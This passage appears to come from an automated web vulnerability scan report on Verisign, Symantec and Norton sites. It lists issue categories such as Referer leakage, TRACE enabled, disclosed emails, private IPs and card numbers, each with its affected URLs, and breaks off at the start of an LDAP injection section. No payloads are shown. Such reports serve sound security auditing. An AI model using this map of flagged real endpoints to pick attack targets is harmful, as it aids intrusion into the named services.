13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html

13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html

13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html

13.6. https://knowledge.verisign.ch/support/mpki-support/index.html

13.7. https://knowledge.verisign.ch/support/mpki-support/index.html

13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index

13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index

13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html

13.15. http://query.verisign.ch/search

13.16. http://query.verisign.ch/search

13.17. https://renewals.symantec.com/renewals/chat_form.jsp

13.18. http://www.verisign.ch/

13.19. http://www.verisign.ch/

13.20. http://www.verisign.ch/contact-information/index.html

13.21. http://www.verisign.ch/contact-information/index.html

13.22. http://www.verisign.ch/corporate/index.html

13.23. http://www.verisign.ch/corporate/index.html

13.24. http://www.verisign.ch/trust-seal/index.html

13.25. http://www.verisign.ch/trust-seal/index.html

14. Cross-domain Referer leakage

14.1. http://blogs.verisign.com/

14.2. http://buy.norton.com/estore/mf/landingProductFeatures

14.3. http://buy.norton.com/estore/mf/upgradeRenewal

14.4. http://community.norton.com/norton/

14.5. http://investor.symantec.com/phoenix.zhtml

14.6. http://investor.symantec.com/phoenix.zhtml

14.7. https://knowledge.verisign.ch/support/code-signing-support/index.html

14.8. https://knowledge.verisign.ch/support/digital-id-support/index.html

14.9. https://knowledge.verisign.ch/support/mpki-support/index.html

14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index

14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html

14.13. https://knowledge.verisign.com/support/code-signing-support/index

14.14. https://knowledge.verisign.com/support/code-signing-support/index.html

14.15. https://knowledge.verisign.com/support/digital-id-support/index.html

14.16. https://knowledge.verisign.com/support/eca-support/index.html

14.17. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

14.18. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

14.19. https://knowledge.verisign.com/support/mpki-support/index.html

14.20. https://knowledge.verisign.com/support/ssl-certificates-support/index

14.21. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

14.22. https://knowledge.verisign.com/support/trust-seal-support/index.html

14.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

14.24. http://player.ooyala.com/player.js

14.25. http://query.verisign.com/search

14.26. http://searchg.symantec.com/search

14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200

14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq

14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/

14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/

14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/

14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7

14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/

14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400

14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/

14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300

14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login

14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login

14.40. http://store.symantec.com/

14.41. https://symantec-corporation.com/servlet/campaignrespondent

14.42. https://trust-center.verisign.ch/process/retail/console_login

14.43. https://trust-center.verisign.com/process/retail/console_login

14.44. https://trust-center.verisign.com/process/retail/trust_product_selector

14.45. http://updatecenter.norton.com/

14.46. http://us.norton.com/beta/index.jsp

14.47. http://us.norton.com/beta/overview.jsp

14.48. http://us.norton.com/norton-utilities/

14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

14.50. http://us.norton.com/products/charts/comparison.jsp

14.51. http://us.norton.com/support/DIY/index.jsp

14.52. http://us.norton.com/support/dtree.jsp

14.53. http://us.norton.com/theme.jsp

14.54. http://us.norton.com/theme.jsp

14.55. http://us.norton.com/theme4.jsp

14.56. http://www.symantec.com/business/products/categories.jsp

14.57. http://www.symantec.com/business/products/purchasing.jsp

14.58. http://www.symantec.com/business/theme.jsp

14.59. http://www.symantec.com/business/verisign/fraud-detection-service

14.60. http://www.symantec.com/partners/sales-and-marketing/sales-marketing.jsp

14.61. http://www.symantec.com/store/products/index.jsp

14.62. http://www.symantec.com/store/resources/index.jsp

14.63. http://www.symantec.com/store/services/index.jsp

14.64. http://www.verisign.ch/

14.65. http://www.verisign.ch/contact-information/index.html

14.66. http://www.verisign.ch/corporate/index.html

14.67. http://www.verisign.ch/trust-seal/index.html

14.68. http://www.verisign.com/code-signing/index.html

14.69. http://www.verisign.com/trust-seal/index.html

14.70. http://www.verisign.com/verisign-worldwide/index.html

15. Cross-domain script include

15.1. http://blogs.verisign.com/web-user-experience/

15.2. http://community.norton.com/norton/

15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline

15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1

15.5. http://de.community.norton.com/

15.6. http://free.pctools.com/free-antivirus/

15.7. http://investor.symantec.com/phoenix.zhtml

15.8. https://knowledge.verisign.ch/support/code-signing-support/index.html

15.9. https://knowledge.verisign.ch/support/digital-id-support/index.html

15.10. https://knowledge.verisign.ch/support/mpki-support/index.html

15.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index

15.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

15.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

15.14. http://query.verisign.ch/search

15.15. https://securitycenter.verisign.com/celp/enroll/outsideSearch

15.16. https://ssl-certificate-center.verisign.ch/process/retail/console_login

15.17. https://ssl-certificate-center.verisign.com/process/retail/console_login

15.18. http://store.symantec.com/

15.19. https://symantec-corporation.com/servlet/campaignrespondent

15.20. https://trust-center.verisign.ch/process/retail/console_login

15.21. https://trust-center.verisign.com/process/retail/console_login

15.22. https://trust-center.verisign.com/process/retail/help_and_support

15.23. https://trust-center.verisign.com/process/retail/trust_product_selector

15.24. http://us.norton.com/360

15.25. http://us.norton.com/downloads/index.jsp

15.26. http://us.norton.com/familyresources/index.jsp

15.27. http://us.norton.com/nortonlive/

15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

15.29. http://us.norton.com/products/index.jsp

15.30. http://us.norton.com/security_response/index.jsp

15.31. http://www.symantec.com/connect/

15.32. http://www.verisign.ch/

15.33. http://www.verisign.ch/contact-information/index.html

15.34. http://www.verisign.ch/corporate/index.html

15.35. http://www.verisign.ch/trust-seal/index.html

15.36. http://www.verisign.com/

15.37. http://www.verisign.com/code-signing/index.html

15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html

15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

15.42. http://www.verisign.com/trust-seal/index.html

15.43. http://www.verisign.com/verisign-worldwide/index.html

15.44. https://www.verisign.com/

15.45. https://www.verisign.com/products-services/index.html

16. TRACE method is enabled

16.1. http://1168.ic-live.com/

16.2. http://blogs.verisign.com/

16.3. https://cert.webtrust.org/

16.4. https://donate.mozilla.org/

16.5. https://partnernet.symantec.com/

16.6. http://press.verisign.com/

16.7. https://press.verisign.com/

17. Email addresses disclosed

17.1. http://blogs.verisign.com/

17.2. http://blogs.verisign.com/web-user-experience/

17.3. http://cdn.verisign.com/assets/shared/js/jquery.cookie.js

17.4. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

17.5. https://enterprise-ssl-admin.verisign.com/

17.6. https://fileconnect.symantec.com/javascript/calendar2.js

17.7. https://idprotect.verisign.com/learnmore.v

17.8. https://idprotect.verisign.com/orderstart.v

17.9. https://idprotect.verisign.com/toolbar/activate.v

17.10. https://idprotect.verisign.com/toolbar/download.v

17.11. https://idprotect.verisign.com/toolbar/home.v

17.12. https://idprotect.verisign.com/toolbar/install.v

17.13. https://idprotect.verisign.com/wheretouse.v

17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html

17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html

17.16. https://knowledge.verisign.ch/support/mpki-support/index.html

17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index

17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html

17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js

17.21. https://knowledge.verisign.com/support/code-signing-support/index

17.22. https://knowledge.verisign.com/support/code-signing-support/index.html

17.23. https://knowledge.verisign.com/support/digital-id-support/index.html

17.24. https://knowledge.verisign.com/support/eca-support/index.html

17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js

17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

17.28. https://knowledge.verisign.com/support/mpki-support/index.html

17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js

17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index

17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html

17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js

17.34. https://policy3.responsys.net/privacy.htm

17.35. https://press.verisign.com/easyir/customrel.do

17.36. http://query.verisign.ch/search

17.37. http://query.verisign.com/cluster.js

17.38. http://query.verisign.com/common.js

17.39. http://query.verisign.com/search

17.40. http://query.verisign.com/uri.js

17.41. https://query.verisign.com/search

17.42. https://renewals.symantec.com/renewals/chat_form.jsp

17.43. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

17.44. http://us.norton.com/beta/overview.jsp

17.45. http://us.norton.com/familyresources/index.jsp

17.46. http://us.norton.com/scripts/colorbox/norton/jquery.colorbox-min.js

17.47. https://vipmanager.verisign.com/vipmgr/createtrialaccount.v

17.48. http://vipmobile.verisign.com/home.v

17.49. https://vipmobile.verisign.com/home.v

17.50. https://vipmobile.verisign.com/supportedphones.v

17.51. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

17.52. http://www.symantec.com/business/theme.jsp

17.53. http://www.symantec.com/connect/

17.54. http://www.symantec.com/searchg/common.js

17.55. http://www.symantec.com/searchg/uri.js

17.56. http://www.verisign.ch/

17.57. http://www.verisign.ch/contact-information/index.html

17.58. http://www.verisign.ch/corporate/index.html

17.59. http://www.verisign.ch/trust-seal/index.html

17.60. http://www.verisign.com/

17.61. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

17.62. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

17.63. http://www.verisign.com/code-signing/index.html

17.64. http://www.verisign.com/partners/ssl-reseller-programs/index.html

17.65. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

17.66. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

17.67. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

17.68. http://www.verisign.com/trust-seal/index.html

17.69. http://www.verisign.com/verisign-worldwide/index.html

17.70. https://www.verisign.com/

17.71. https://www.verisign.com/products-services/index.html

18. Private IP addresses disclosed

18.1. http://query.verisign.com/cluster.js

18.2. http://query.verisign.com/search

18.3. https://query.verisign.com/search

19. Credit card numbers disclosed

19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf

20. Robots.txt file

20.1. http://1168.ic-live.com/goat.php

20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif

20.3. https://admin.instantservice.com/links/5851/14753

20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif

20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/

20.7. http://buy.norton.com/

20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css

20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

20.10. http://ch.norton.com/

20.11. http://com-verisign.netmng.com/

20.12. http://community.norton.com/norton/

20.13. http://de.community.norton.com/

20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/

20.15. http://gs.instantservice.com/geoipAPI.js

20.16. http://investor.symantec.com/phoenix.zhtml

20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

20.18. https://knowledge.verisign.com/favicon.ico

20.19. http://l.addthiscdn.com/live/t00/200lo.gif

20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image

20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836

20.22. http://partnerlocator.symantec.com/public/search

20.23. http://player.ooyala.com/player.js

20.24. http://productadvisor.symantec.com/app/en/US/adirect/symantec

20.25. https://products.geotrust.com/signup/codesign.do

20.26. https://products.verisign.com/geocenter/reseller/logon.do

20.27. http://query.verisign.ch/search

20.28. http://query.verisign.com/search

20.29. https://query.verisign.com/search

20.30. http://rs.instantservice.com/resources/smartbutton/5851/II3_Servers.js

20.31. http://searchg.symantec.com/search

20.32. https://ssl-certificate-center.verisign.ch/process/retail/console_login

20.33. https://ssl-certificate-center.verisign.com/process/retail/console_login

20.34. https://symantec-corporation.com/servlet/campaignrespondent

20.35. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

20.36. https://test-products.verisign.com/geocenter/reseller/logon.do

20.37. https://trust-center.verisign.ch/process/retail/trust_initial

20.38. https://trust-center.verisign.com/process/retail/trust_initial

20.39. http://twitter.com/statuses/user_timeline/pctools.json

20.40. http://us.norton.com/index.jsp

20.41. https://us.norton.com/index.jsp

20.42. https://www-secure.symantec.com/feedback/webmaster.jsp

20.43. http://www.google-analytics.com/__utm.gif

20.44. http://www.symantec.com/scripts/swfobject.js

20.45. http://www.verisign.ch/

20.46. http://www.verisign.com/

20.47. https://www.verisign.com/products/site/

21. Cacheable HTTPS response

21.1. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

21.2. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

21.3. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

21.4. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

21.5. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

21.6. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

21.7. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

21.8. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

21.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

21.10. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

21.11. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

21.12. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

21.13. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

21.14. https://cert.webtrust.org/ViewSeal

21.15. https://fileconnect.symantec.com/

21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

21.17. https://idprotect.verisign.com/common/scripts/dlText.js

21.18. https://idprotect.verisign.com/secureredirect.v

21.19. https://idprotect.verisign.com/toolbar/downloadIE.v

21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html

21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html

21.22. https://knowledge.verisign.ch/support/mpki-support/index.html

21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html

21.26. https://knowledge.verisign.com/favicon.ico

21.27. https://knowledge.verisign.com/support/code-signing-support/index

21.28. https://knowledge.verisign.com/support/code-signing-support/index.html

21.29. https://knowledge.verisign.com/support/digital-id-support/index.html

21.30. https://knowledge.verisign.com/support/eca-support/index.html

21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

21.33. https://knowledge.verisign.com/support/mpki-support/index.html

21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index

21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html

21.37. https://partnernet.symantec.com/

21.38. https://policy3.responsys.net/

21.39. https://policy3.responsys.net/permission.htm

21.40. https://policy3.responsys.net/privacy.htm

21.41. https://press.verisign.com/easyir/customrel.do

21.42. https://products.verisign.com/geocenter/reseller/doregister.do

21.43. https://products.verisign.com/geocenter/reseller/logon.do

21.44. https://products.verisign.com/geocenter/reseller/logon.jsp

21.45. https://products.verisign.com/geocenter/reseller/register.do

21.46. https://query.verisign.com/search

21.47. https://renewals.symantec.com/renewals/application

21.48. https://renewals.symantec.com/renewals/chat_form.jsp

21.49. https://renewals.symantec.com/renewals/chat_norton.jsp

21.50. https://renewals.symantec.com/renewals/renewal_search.jsp

21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp

21.52. https://seal.verisign.com/getseal

21.53. https://securitycenter.verisign.com/

21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch

21.55. https://test-products.verisign.com/geocenter/reseller/logon.do

21.56. https://us.norton.com/index.jsp

21.57. https://vipmobile.verisign.com/home.v

21.58. https://vipmobile.verisign.com/supportedphones.v

21.59. https://www-secure.symantec.com/

21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp

21.61. https://www-secure.symantec.com/about/profile/policies/legal.jsp

21.62. https://www-secure.symantec.com/about/profile/policies/privacy.jsp

21.63. https://www-secure.symantec.com/business/theme.jsp

21.64. https://www-secure.symantec.com/feedback/contactus.jsp

21.65. https://www-secure.symantec.com/feedback/webmaster.jsp

21.66. https://www-secure.symantec.com/globalsites/index.jsp

21.67. https://www-secure.symantec.com/index.jsp

21.68. https://www-secure.symantec.com/rss/index.jsp

21.69. https://www-secure.symantec.com/sitemap/index.jsp

21.70. https://www.verisign.com/

21.71. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

21.72. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

21.73. https://www.verisign.com/products-services/index.html

22. HTML does not specify charset

22.1. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

22.2. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

22.3. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.4. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

22.5. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

22.6. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

22.7. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

22.8. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

22.9. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

22.10. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

22.11. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

22.12. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

22.13. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.14. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

22.15. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

22.16. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

22.17. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

22.18. https://cert.webtrust.org/ViewSeal

22.19. https://enterprise-ssl-admin.verisign.com/

22.20. https://fileconnect.symantec.com/

22.21. https://fileconnect.symantec.com/favicon.ico

22.22. https://fileconnect.symantec.com/javascript/common.js

22.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index

22.24. https://knowledge.verisign.com/support/code-signing-support/index

22.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

22.26. https://knowledge.verisign.com/support/ssl-certificates-support/index

22.27. http://partnerlocator.symantec.com/

22.28. http://partnerlocator.symantec.com/public/product_finder

22.29. http://partnerlocator.symantec.com/public/pulldown_list

22.30. http://partnerlocator.symantec.com/public/search

22.31. https://partnernet.symantec.com/

22.32. http://player.ooyala.com/info/primary/

22.33. https://policy3.responsys.net/

22.34. https://renewals.symantec.com/renewals/chat_norton.jsp

22.35. https://securitycenter.verisign.com/

22.36. https://securitycenter.verisign.com/celp/enroll/orderStatus

22.37. https://securitycenter.verisign.com/celp/enroll/outsideSearch

22.38. https://securitycenter.verisign.com/celp/enroll/retail

22.39. https://securitycenter.verisign.com/celp/enroll/upsell

22.40. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

22.41. http://www.verisign.ch/

22.42. http://www.verisign.ch/assets/global/js/leftnav.js

22.43. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

22.44. http://www.verisign.ch/assets/shared/js/leftnav_new.js

22.45. http://www.verisign.ch/corporate/index.html

22.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

22.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

22.48. http://www.verisign.com/

22.49. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

22.50. http://www.verisign.com/authweb/global/assets/header/js/header.js

22.51. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

22.52. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

22.53. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

22.54. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

22.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

22.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

22.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

22.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

22.59. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

22.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

22.61. https://www.verisign.com/

22.62. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

22.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

23. Content type incorrectly stated

23.1. http://ak.c.ooyala.com/w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7

23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff

23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg

23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg

23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js

23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js

23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js

23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js

23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js

23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js

23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js

23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js

23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js

23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js

23.22. https://cert.webtrust.org/ViewSeal

23.23. http://com-verisign.netmng.com/

23.24. https://fileconnect.symantec.com/images/Sigstand.jpg

23.25. http://free.pctools.com/favicon.ico

23.26. http://gs.instantservice.com/geoipAPI.js

23.27. https://idprotect.verisign.com/common/scripts/dlText.js

23.28. https://idprotect.verisign.com/imageapp.v

23.29. https://idprotect.verisign.com/membersites.v

23.30. https://knowledge.verisign.com/favicon.ico

23.31. http://mbox3.offermatica.com/m2/verisign/mbox/standard

23.32. http://partnerlocator.symantec.com/public/product_finder

23.33. http://partnerlocator.symantec.com/public/pulldown_list

23.34. http://player.ooyala.com/info/primary/

23.35. http://player.ooyala.com/sas/authorized

23.36. http://query.verisign.com/cluster

23.37. http://sales.liveperson.net/hcp/html/mTag.js

23.38. https://seal.verisign.com/getseal

23.39. http://sr2.liveperson.net/hcp/html/mTag.js

23.40. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

23.41. http://www.symantec.com/s/searchg/suggest

23.42. http://www.symantec.com/search/searchjs.jsp

23.43. http://www.verisign.ch/assets/global/js/leftnav.js

23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js

23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js

23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js

23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js

23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js

23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico

23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg

23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg

23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

24. Content type is not specified

24.1. https://fileconnect.symantec.com/javascript/calendar2.js

24.2. https://fileconnect.symantec.com/javascript/s_code.js

24.3. https://fileconnect.symantec.com/javascript/validations.js

24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

24.5. http://l.player.ooyala.com/verify

24.6. https://renewals.symantec.com/renewals/js/InstantInvite3.js

24.7. https://renewals.symantec.com/renewals/js/commonFunctions.js

24.8. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js

24.9. https://renewals.symantec.com/renewals/js/dhtmlwindow.js

24.10. https://renewals.symantec.com/renewals/js/getPageNames.js

24.11. https://renewals.symantec.com/renewals/js/modal.js

24.12. https://renewals.symantec.com/renewals/js/mySymantecDevKit.js

24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js

24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js

24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js

24.16. http://us.norton.com/www-uat.ges.sym

24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/

24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/

24.19. http://www.symantec.com/business/verisign/fraud-detection-service



1. LDAP injection
There are 12 instances of this issue:

Issue background

